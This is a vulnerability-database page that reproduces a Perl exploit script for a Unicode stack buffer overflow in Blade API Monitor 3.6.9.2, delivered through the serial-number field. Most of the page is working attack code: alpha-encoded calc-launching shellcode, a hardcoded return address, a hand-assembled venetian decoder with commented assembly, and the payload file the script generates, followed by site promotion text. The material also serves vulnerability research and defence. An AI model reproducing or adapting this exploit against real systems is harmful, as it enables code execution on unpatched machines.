Vulners
Lucene search
Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow
# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################
my $file= "bof_blade.txt";
# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";
#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";
my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP
my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;
my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";
# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|
# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|
# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|
# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|
$finder = $part0.$part1.$part2.$part3;
open($FILE,">$file");
print $FILE $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
close($FILE);
print "File Created successfully\n";
# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCCData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Jan 2012 00:00Current
7.4High risk
Vulners AI Score7.4